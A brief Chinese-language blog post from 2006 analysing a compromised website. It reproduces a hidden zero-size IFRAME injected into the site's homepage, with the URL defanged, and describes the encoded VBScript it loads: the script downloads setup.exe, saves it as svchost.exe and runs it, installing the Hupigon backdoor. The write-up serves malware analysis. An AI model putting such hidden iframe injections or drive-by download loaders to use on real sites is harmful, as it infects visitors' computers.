一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

endurer 原创

2006-11-22 第1

该网站首页首部被加入代码:
/-----------
<IFRAME src="hxxp://58***000.128**.to***for.com/x***skj.htm width=0 height=0></IFRAME>
-----------/


x***skj.htm  的内容为escape()加密的VBScript代码,功能为:利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 setup.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

setup.exe 文件大小为301 KB (308,224 字节),Kaspersky 报为 Backdoor.Win32.Hupigon.cge。 

你可能感兴趣的:(加密,iframe,VBScript)